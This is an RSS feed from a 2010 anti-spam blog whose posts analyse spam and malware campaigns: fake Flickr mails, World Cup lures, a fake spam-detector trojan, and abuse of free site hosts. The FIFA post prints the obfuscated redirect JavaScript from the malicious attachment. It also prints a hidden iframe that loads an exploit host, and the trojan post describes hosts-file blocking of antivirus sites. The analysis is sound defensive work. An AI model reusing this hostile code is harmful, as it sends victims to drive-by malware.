<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>mxlab - all about anti virus and anti spam &#187; Spam</title>
	<atom:link href="http://blog.mxlab.eu/category/spam/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.mxlab.eu</link>
	<description>mx lab blog - all about anti virus and anti spam</description>
	<lastBuildDate>Wed, 28 Jul 2010 23:26:06 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='blog.mxlab.eu' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://www.gravatar.com/blavatar/8be3c09044ac5968d17dadf3224891c4?s=96&#038;d=http://s2.wp.com/i/buttonw-com.png</url>
		<title>mxlab - all about anti virus and anti spam &#187; Spam</title>
		<link>http://blog.mxlab.eu</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://blog.mxlab.eu/osd.xml" title="mxlab - all about anti virus and anti spam" />
	<atom:link rel='hub' href='http://blog.mxlab.eu/?pushpress=hub'/>
		<item>
		<title>Flickr welcome message leads to Canadian Pharmacy web site</title>
		<link>http://blog.mxlab.eu/2010/07/06/flickr-welcome-message-leads-to-canadian-pharmacy-web-site/</link>
		<comments>http://blog.mxlab.eu/2010/07/06/flickr-welcome-message-leads-to-canadian-pharmacy-web-site/#comments</comments>
		<pubDate>Tue, 06 Jul 2010 16:06:13 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Spam]]></category>
		<category><![CDATA[Canadian Neighbor Pharmacy]]></category>
		<category><![CDATA[canadian pharmacy]]></category>
		<category><![CDATA[Flickr]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=947</guid>
		<description><![CDATA[Various brands have been subject to spam campaigns and today Flickr, the photo sharing web site, is now also being abused by spammers. MX Lab started to intercept messages with the subject &#8220;[Flickr] Welcome!&#8221;, send from a spoofed email address, with an welcome message  from Flickr (see image below). Every link in the message leads [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=947&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>Various brands have been subject to spam campaigns and today Flickr, the photo sharing web site, is now also being abused by spammers.</p>
<p>MX Lab started to intercept messages with the subject &#8220;[Flickr] Welcome!&#8221;, send from a spoofed email address, with an welcome message  from Flickr (see image below).</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100706_flickr_spam.jpg" alt="" width="450" height="683" /></p>
<p>Every link in the message leads to a different URL, even the links behind Terms of Services or the Privacy Policy.</p>
<p>hxxp://mahimatex.com/sanitation.html<br />
hxxp://electricbrochures.com/custodian.html<br />
hxxp://eventosgs.com.ar/climate.html<br />
hxxp://newcivas.altervista.org/overstatements.html<br />
hxxp://complicat.go.ro/modestly.html<br />
hxxp://kankash-g-s.com/chicagoans.html<br />
hxxp://pliki.open-it.pl/deigned.html<br />
hxxp://turismatica.go.ro/grapefruit.html<br />
hxxp://behsood.ir/schedulable.html<br />
hxxp://jpaquino.com/headlines.html<br />
hxxp://awtchiro.com/consulates.html</p>
<p>The web sites above function as a redirect to hxxp://keptoften.com/</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100215_canadianpharmacy.jpg" alt="" width="450" height="418" /></p>
<p>Each message has different URLs included so these spammers are using a massive amount of domains in this campaign.</p>
<p>I personally do not understand why they are doing this because an Intent Analysis filter, that analyses the included URLs in emails, can blacklist many URLs from these web sites immediatly when investigating one single spam message.</p>
<p>When only using the domain for visiting the sites we get quite often a warning from our browser that the site is known to host malware. In other cases, or when ignoring the warning, we are redirected to hxxp://bestadultsite.ru/run/go.php?sid=3 and afterwards to the web site of Canadian Neighbor Pharmacy hxxp://pharmacymentalhealth.com (see image below).</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100706_can_neighb_pharma.jpg" alt="" width="450" height="299" /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/947/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/947/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/947/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/947/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/947/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/947/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/947/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/947/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/947/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/947/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=947&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/07/06/flickr-welcome-message-leads-to-canadian-pharmacy-web-site/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20100706_flickr_spam.jpg" medium="image" />

		<media:content url="http://www.mxlab.eu/img_news/20100215_canadianpharmacy.jpg" medium="image" />

		<media:content url="http://www.mxlab.eu/img_news/20100706_can_neighb_pharma.jpg" medium="image" />
	</item>
		<item>
		<title>Thumbs up for Bit.ly to block shortened URL in &#8220;Coupe du Monde de la FIFA 2010&#8243; spam</title>
		<link>http://blog.mxlab.eu/2010/06/11/thumbs-up-for-bit-ly-to-block-shortened-url-in-coupe-du-monde-de-la-fifa-2010-spam/</link>
		<comments>http://blog.mxlab.eu/2010/06/11/thumbs-up-for-bit-ly-to-block-shortened-url-in-coupe-du-monde-de-la-fifa-2010-spam/#comments</comments>
		<pubDate>Fri, 11 Jun 2010 16:05:18 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Spam]]></category>
		<category><![CDATA[bit.ly]]></category>
		<category><![CDATA[FIFA]]></category>
		<category><![CDATA[FIFA World Cup South Africa]]></category>
		<category><![CDATA[FLVDirect]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=929</guid>
		<description><![CDATA[Emails with regarding FIFA World Cup are going around the world now and persons who have less good intentions are on the lookout to create some mayhem. A recent example is the email &#8220;FIFA World Cup South Africa&#8230; bad news&#8221; but the traditional spam messages are also going around on the internet. MX lab intercepted [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=929&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>Emails with regarding FIFA World Cup are going around the world now and persons who have less good intentions are on the lookout to create some mayhem. A recent example is the email &#8220;<a href="http://blog.mxlab.eu/2010/06/11/fifa-world-cup-south-africa-bad-news-emails-leads-reader-to-host-with-malware/" target="_blank">FIFA World Cup South Africa&#8230; bad news</a>&#8221; but the traditional spam messages are also going around on the internet.</p>
<p>MX lab intercepted some emails with the subject &#8220;Coupe du Monde de la FIFA 2010&#8243; from World Cup &lt;207peugeot@menara.ma&gt; that are obviously spam and here is the body of the email:</p>
<blockquote><p>bonjour ,</p>
<p>est ce que vous voulez voir les matchs de la coupe gratuitement ?<br />
si oui n&#8217;hesiter pas a telecharger ce logiciel  :</p>
<p>http://bit.ly/worldcupe</p>
<p>cordialement</p>
<p>=========================================</p></blockquote>
<p>The message is in the French language but translated it offers you an option to get software to watch the soccer matches of the World Cup for free.</p>
<p>When using the bit.ly URL shortened link we arrive on the FLV web site http://www.flvpro.com/movies/?aff=4749_movies.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100611_flv_spam.jpg" alt="" width="450" height="326" /></p>
<p>While this is all great, a free download of such a tool, getting your message in this format out to the world is not the way to do it. I refer to the use of bit.ly for the URL, no unsubscribe options and no clear indication who has sent this message. Very bad marketing if you ask me.</p>
<p>MX Lab reprted this to bit.ly, which is something we usually do not do but we thought why not, and bit.ly responded within 10 mintes with a reply that the shortened URL is blocked for further use. Thumbs up for such a fast response.</p>
<p>Now, this is completely off topic, but notice the counter &#8216;Downloaded 2358755 times&#8217; on the web site http://www.flvpro.com/. This is just a Javascript ticker that increases the counter.</p>
<blockquote>
<pre>&lt;script type="text/javascript"&gt;
var num = 2358754;
function IncCounter() {
num = num + 1;   // increment counter by 2
document.getElementById("cntr").innerHTML = num.toLocaleString();
t = setTimeout('IncCounter()', 2000);
// change 1000 to 60000 to update once per minute
}
&lt;/script&gt;</pre>
</blockquote>
<p>When you refresh the page, the counter is back to 2358755.<br />
Very nice marketing! <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/929/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/929/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/929/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/929/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/929/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/929/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/929/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/929/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/929/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/929/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=929&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/06/11/thumbs-up-for-bit-ly-to-block-shortened-url-in-coupe-du-monde-de-la-fifa-2010-spam/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20100611_flv_spam.jpg" medium="image" />
	</item>
		<item>
		<title>&#8220;FIFA World Cup South Africa&#8230; bad news&#8221; emails leads reader to host with malware</title>
		<link>http://blog.mxlab.eu/2010/06/11/fifa-world-cup-south-africa-bad-news-emails-leads-reader-to-host-with-malware/</link>
		<comments>http://blog.mxlab.eu/2010/06/11/fifa-world-cup-south-africa-bad-news-emails-leads-reader-to-host-with-malware/#comments</comments>
		<pubDate>Fri, 11 Jun 2010 14:43:36 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Email security]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[FIFA]]></category>
		<category><![CDATA[FIFA World Cup South Africa]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=919</guid>
		<description><![CDATA[MX Lab intercepted a few samples of emails with the subject &#8220;FIFA World Cup South Africa&#8230; bad news&#8221;. The from address is spoofed and this is the body of the email: Hello!! FIFA World Cup 2010 scandal news, read attached document Attached is the file news.html or open.html that contains a malicious javascript: &#60;script type=&#8217;text/javascript&#8217;&#62; [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=919&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab intercepted a few samples of emails with the subject &#8220;FIFA World Cup South Africa&#8230; bad news&#8221;.</p>
<p>The from address is spoofed and this is the body of the email:</p>
<blockquote><p>Hello!!</p>
<p>FIFA World Cup 2010 scandal news, read attached document</p></blockquote>
<p>Attached is the file news.html or open.html that contains a malicious javascript:</p>
<blockquote>
<div id="_mcePaste">&lt;script type=&#8217;text/javascript&#8217;&gt;</div>
<div id="_mcePaste">function dX(){};</div>
<div id="_mcePaste">var h=new Date();</div>
<div id="_mcePaste">dX.prototype = {</div>
<div id="_mcePaste">f : function() {</div>
<div id="_mcePaste">var u=function(){};</div>
<div id="_mcePaste">var uY=new Date();</div>
<div id="_mcePaste">var o=&#8221;";</div>
<div id="_mcePaste">var k=document;</div>
<div id="_mcePaste">var oE=function(){};</div>
<div id="_mcePaste">var l=&#8221;;</div>
<div id="_mcePaste">this.i=33457;</div>
<div id="_mcePaste">var kV=k['l.oSc&lt;a(t&lt;i_oSnS'.replace(/[S_\&lt;\(\.]/g, &#8221;)];</div>
<div id="_mcePaste">var w=function(){};</div>
<div id="_mcePaste">var p=false;</div>
<div id="_mcePaste">this.pP=false;</div>
<div id="_mcePaste">this.s=&#8221;;</div>
<div id="_mcePaste">kV['hGrGe&gt;f&gt;'.replace(/[\&gt;mYGw]/g, &#8221;)]=&#8217;hJt&gt;t&gt;p&gt;:S/2/2aSd&gt;v2aSnlcleldSwloloJd&gt;tSe2c2hJ.2cSo&gt;ml/<br />
2xJnSuJ4JeSjS/2z2.ShltlmJ&#8217;.replace(/[JS2\&gt;l]/g, &#8221;);</div>
<div id="_mcePaste">var iK=&#8221;iK&#8221;;</div>
<div id="_mcePaste">pK=&#8221;;</div>
<div id="_mcePaste">this.d=&#8221;d&#8221;;</div>
<div id="_mcePaste">uM=&#8221;";</div>
<div id="_mcePaste">}</div>
<div id="_mcePaste">};</div>
<div id="_mcePaste">this.dK=&#8221;";</div>
<div id="_mcePaste">var fG=new dX();</div>
<div id="_mcePaste">var dR=&#8221;dR&#8221;;</div>
<div id="_mcePaste">fG.f();</div>
<div id="_mcePaste">hJ=false;</div>
<div id="_mcePaste">&lt;/script&gt;</div>
</blockquote>
<p>This Javascript will redirect your browser to hxxp://advancedwoodtech.com/xnu4ej/z.htm.</p>
<p>At the moment, the web site page mentioned here is not active, we got a 404 error when visiting, so we can&#8217;t investigate this further. But we are pretty sure that you will download some malware with an attempt to infect your computer and get redirected to a spam web site of the Canadian Pharmacy.</p>
<p>This email has all the characteristics of previous campaigns where social media is being used to lure visitors to a web site and get their computer infected.</p>
<p>Our recommendation is: when you receive this type of email, do not open the attached HTML file and delete the email.</p>
<p>[UPDATE]</p>
<p>MX Lab intercepted a new version of this social engineering attack and the email now contains the file open.html.</p>
<p>This leads to the web site hxxp://shoppingbazzar.co.uk/z.htm. The online document z.html contains the following code:</p>
<blockquote>
<pre>&lt;<span class="start-tag">meta</span><span class="attribute-name"> http-equiv</span>=<span class="attribute-value">"refresh" </span><span class="attribute-name">content</span>=<span class="attribute-value">"3;url=hxxp://toldspeak.com/" </span><span class="error"><span class="attribute-name">/</span></span>&gt;

&lt;<span class="start-tag">iframe</span><span class="attribute-name"> src</span>='hxxp://hugefrogs.ru:8080/index.php?pid=10' <span class="attribute-name">width</span>=<span class="attribute-value">'1'
</span><span class="attribute-name">height</span>=<span class="attribute-value">'1' </span><span class="attribute-name">style</span>=<span class="attribute-value">'visibility: hidden;'</span>&gt;&lt;/<span class="end-tag">iframe</span>&gt;</pre>
</blockquote>
<p>This will redirect your browser to hxxp://toldspeak.com after 3 seconds that contains the Canadian Pharmacy web site as mentioned earlier.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100215_canadianpharmacy.jpg" alt="" width="450" height="418" /></p>
<p>The site hxxp://hugefrogs.ru:8080/index.php?pid=10 contains more obfuscated JavaScript that creates an iframe to a PDF file and to a Java .jar file. With one of these files an attack is being executed to the computer.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/919/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/919/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/919/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/919/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/919/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/919/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/919/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/919/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/919/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/919/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=919&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/06/11/fifa-world-cup-south-africa-bad-news-emails-leads-reader-to-host-with-malware/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20100215_canadianpharmacy.jpg" medium="image" />
	</item>
		<item>
		<title>Explorer SPAM Detector for Public is malware</title>
		<link>http://blog.mxlab.eu/2010/03/13/explorer-spam-detector-for-public-is-malware/</link>
		<comments>http://blog.mxlab.eu/2010/03/13/explorer-spam-detector-for-public-is-malware/#comments</comments>
		<pubDate>Sat, 13 Mar 2010 00:37:42 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Spam]]></category>
		<category><![CDATA[Viruses]]></category>
		<category><![CDATA[Explorer SPAM Detector]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Symantec]]></category>
		<category><![CDATA[trojan]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=790</guid>
		<description><![CDATA[MX Lab intercepted a few messages with the subject &#8220;Systematic Security Software : Explorer SPAM Detector for Public&#8221; send from the spoofed address Systematic Inc &#60;soft@systematic.com&#62;. The email offers a software tool called Explorer Spam Detector from Symantec: Systematic launched a new program SPAM detector Explorer, the program automatically detects if a page is original or [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=790&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab intercepted a few messages with the subject &#8220;Systematic Security Software : Explorer SPAM Detector for Public&#8221; send from the spoofed address Systematic Inc &lt;soft@systematic.com&gt;.</p>
<p>The email offers a software tool called Explorer Spam Detector from Symantec:</p>
<blockquote><p>Systematic launched a new program SPAM detector Explorer, the program automatically detects if a page is original or not, if you open a mail if the sender is not original is detected. If you are tired of spammers and you are tired as your accounts will be broken, to lose money on paypal or lose auctions, Download this program and all your data, all your accounts will be safe. This program is free, you do not need to buy it, you do not need a license.</p></blockquote>
<p>Below is an actual screenshot of the email:</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100313_symantex_explspam.gif" alt="" width="450" height="392" /></p>
<p>The included URLs wil take you to a web site where the malware is hosted: hxxp://systematic.armed.us/download/Setup.exe.</p>
<p>The malware is approx. 1,5 MB when downloaded and is named Setup.exe.</p>
<p>Submission to Virus Total gives us the result that only 1 of the 40 AV engines did detect the malware: Symantec AV engine version 20091.2.0.41. The name Suspicious.Insight is a detection for files from the Symantec’s reputation-based security technology so this is not the name of the malware.</p>
<p>When executed on a computer, the system gets infected and a new window is created:</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100313_symantex_explspam2.gif" alt="" width="285" height="130" /></p>
<p>With the appearance of this window on your system you could have the indication that the software didn&#8217;t installed correctly. By now, your computer is infected.</p>
<p>Folowing files are created:</p>
<p>%AppData%\Microsoft\System\Services\[filename of the sample #1]  where %AppData% is a variable that refers to the file system directory that serves as a common repository for application-specific data. A typical path is C:\Documents and Settings\[UserName]\Application Data.</p>
<p>The file %System%\drivers\etc\hosts is modifed and following folders are created:</p>
<p>* %AppData%\Microsoft\System<br />
* %AppData%\Microsoft\System\Services</p>
<p>A Windows registtry is added so that the malware is run each time the computer boots:</p>
<p># [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br />
* [filename of the sample #1] = &#8220;%AppData%\Microsoft\System\Services\[filename of the sample #1]&#8220;</p>
<p>The HOSTS file is updated with the following URL-to-IP mappings:</p>
<p>127.0.0.1 www.virscan.org<br />
127.0.0.1 virscan.org<br />
127.0.0.1 221.207.255.61<br />
127.0.0.1 www.virustotal.com<br />
127.0.0.1 virustotal.com<br />
127.0.0.1 74.53.201.162<br />
127.0.0.1 scanner.novirusthanks.org<br />
127.0.0.1 91.121.223.25<br />
127.0.0.1 www.xxbots.net<br />
127.0.0.1 xxbots.net<br />
127.0.0.1 208.43.26.70<br />
127.0.0.1 www.virusscan.jotti.org<br />
127.0.0.1 virusscan.jotti.org<br />
127.0.0.1 66.36.241.92<br />
127.0.0.1 forums.malwarebytes.org<br />
127.0.0.1 74.63.217.106<br />
127.0.0.1 www.codespace.net<br />
127.0.0.1 codespace.net<br />
127.0.0.1 174.133.4.108</p>
<p>As you can see, with this action you will not longer have access to the web sites that are listed here. Due to the HOSTS file change, all request to visit these sites will point you back to your local computer on 127.0.0.1. This is in order to avoid that the user can visit these sites for information or for downloading anti virus/malware software. If you are infected with this malware, make sure that you modify the HOSTS file.</p>
<p>The possible country of origin for this malware is Russia.</p>
<p>Virus Total <a href="http://www.virustotal.com/analisis/7810eb2fea65976a7aca3b7b8bf625dde641d2393c99e765b5032f60d8875f33-1268438878" target="_blank">permlink</a> and MD5: 97ff431ca077c59d76d147832260b7ef.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/790/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/790/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/790/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/790/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/790/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/790/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/790/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/790/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/790/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/790/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=790&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/03/13/explorer-spam-detector-for-public-is-malware/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20100313_symantex_explspam.gif" medium="image" />

		<media:content url="http://www.mxlab.eu/img_news/20100313_symantex_explspam2.gif" medium="image" />
	</item>
		<item>
		<title>Web site creator hosts are being abused in spam campaigns</title>
		<link>http://blog.mxlab.eu/2010/03/06/web-site-creator-hosts-are-being-abused-in-spam-campaigns/</link>
		<comments>http://blog.mxlab.eu/2010/03/06/web-site-creator-hosts-are-being-abused-in-spam-campaigns/#comments</comments>
		<pubDate>Sat, 06 Mar 2010 11:30:46 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Spam]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=773</guid>
		<description><![CDATA[Spammers are not afraid to abuse community sites or blog creators like blogspot.com in their spam campaigns. In some cases, the content is published on these site or a redirect is embedded and forwards the visitor to the web site of their choice offering porn, pills and other stuff. MX Lab noticed an increase the [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=773&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>Spammers are not afraid to abuse community sites or blog creators like blogspot.com in their spam campaigns. In some cases, the content is published on these site or a redirect is embedded and forwards the visitor to the web site of their choice offering porn, pills and other stuff.</p>
<p>MX Lab noticed an increase the last few days of URLs in spam messages that point to (free) web site creater hosts or less well know blog creators. Some of the latest victims are doodlekit.com, sitekreator.com, webs.com, webstarts.com and blogdrive.com.</p>
<p>Some examples of the spam:</p>
<blockquote><p>of necromancer beyond power drill ostensibly wily<br />
dissidents customer<br />
PornstarMikaTanAnalFingering hxxp://trhombic.blogdrive.com<br />
because girls</p></blockquote>
<blockquote><p>dissidents blotched greedily</p>
<p>mirror about starlet likeable<br />
WorldOfLustyAmatteurGalsFujckkingOnCameraWithBigCodfckedLadsAndBelovedSelxToys hxxp://sitekreator.com/Dewtty/sdfgty.html</p>
<p>haunchestoward</p></blockquote>
<blockquote><p>for cleavage inside carelessly womanly<br />
bubble baths scythe<br />
AsianSuckingAndFuckingHardcore hxxp://wilfredorz.webs.com<br />
or tea parties</p></blockquote>
<blockquote><p>over and accidentally</p>
<p>tea parties flabby<br />
WorldOfLustyAmatenurGalsFujckkingOnCameraWithBigCobckedLadsAndBelovedSjexToys hxxp://s2.webstarts.com/ssey/q2.html</p>
<p>philosopherssecretly</p></blockquote>
<p>What we also notice is the use of random words in the spam message again. This is a very common technique being used in the past to avoid detected by Bayesian filters and/or to compromise and corrupt the knowledge database of the Bayesian filter when the message is used to train the filter.</p>
<p>This technique is also present in the latest spam campaign of the Canadian Pharmacy:</p>
<blockquote><p>This is a link to our shop http://bc.greatsilent.ru/</p>
<p>gazoive dyojefip eicyla uxamo kajoubemi zitykiboto yejy<br />
irewyumuco izaafoe samin uypoi nyqii asydado<br />
hoxyaogeqa eokinap asiwy yziuboaxoj alomem kawuqyxy<br />
ajitikumoa fiaxe oqoce qiahow yvenouwa bosyebuje ucotaley<br />
yeqa uhybyo nidodyziru logu noboma uuju uedywaby<br />
&#8230;. (cut)&#8230;.</p></blockquote>
<p>New web site creator hosts are being used each day. When I visited a few of those web site creator host I found out that subscription is so easy to do. You can automate account requests quite easily up to a certain point without being blocked by some way of security measure or by clicking on an activation link by email.</p>
<p>On doodlekit.com we found a CAPTCHA security on the subscription web form but I believe that a good CAPTCHA should have letters that are less readable than this one. But, this is a start.</p>
<p>On webs.com I did set up a dummy web site account with the site address http://tryviagra.webs.com without any security measure! This means that anyone can set up an free web site creator account when completing the webforms.</p>
<p>In this particular case, I can even automate every step and let a bot do all the work for you. I could create from 10 to 100 accounts on a day and perhaps the site administrators wouldn&#8217;t even notice this. It is a very efficient way of getting coverage on the internet, getting free hosting for my site or redirect visitors to my site.</p>
<p>To make it worse, I can also place malware on this site and try to infect each visitor on my site with malware, ransomware or other malicious files.</p>
<p>As a spammer, I have the advantage over Intent Anyalisis tools or SURBL, tools that examine and block messages based on the included URLs, by generating mutliple URLs each day and changing URLs in the spam message.</p>
<p>Again, it shows that internet security is a responsability of everyone and everyone should get involved. If we want to stop spammers, we also have to make sure that some of the features that spammers have today &#8211; this is a nice example I think &#8211; can&#8217;t be used tomorrow.</p>
<p>Feel free to comment on this post.</p>
<p>Disclaimer: it is not our intention to attack webs.com on their lack of security &#8211; perhaps in a certain way it is &#8211; but to point out how easy it is to abuse certain online tools.</p>
